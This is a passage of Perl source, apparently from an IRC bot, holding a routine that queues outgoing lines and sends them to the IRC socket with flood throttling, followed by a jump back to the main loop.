    if ($_[0] eq 'de-queue') { goto dq };
    if (!defined($ircsock)) { return; }
    my $text = shift;
    chomp($text);
    $qlength = push @lq, $text;
    defer: return 0;
    dq: $lsent = 0;
    $qlength = @lq;
    if ($qlength > 0) {
        debug "de-queueing, $max_lines lines max, $qlength lines in queue.\r\n";
    }
    foreach my $n (1..($max_lines - $lsent)) {
        last unless scalar(@lq);
        $sentlines++;
        if ($sentlines > "35") {
            debug "WARNING: sent $sentlines lines within one minute (slowing down)\r\n";
            sleep(0.37);
        }
        $text = shift(@lq) . "\r\n";
        debug "SEND: $text";
        print $ircsock $text or reconnect('couldnt sendqueue');
        $lsent++;
    }
    return 1;
}

# Reached when the receive loop ends (socket closed): jump back to START.
goto START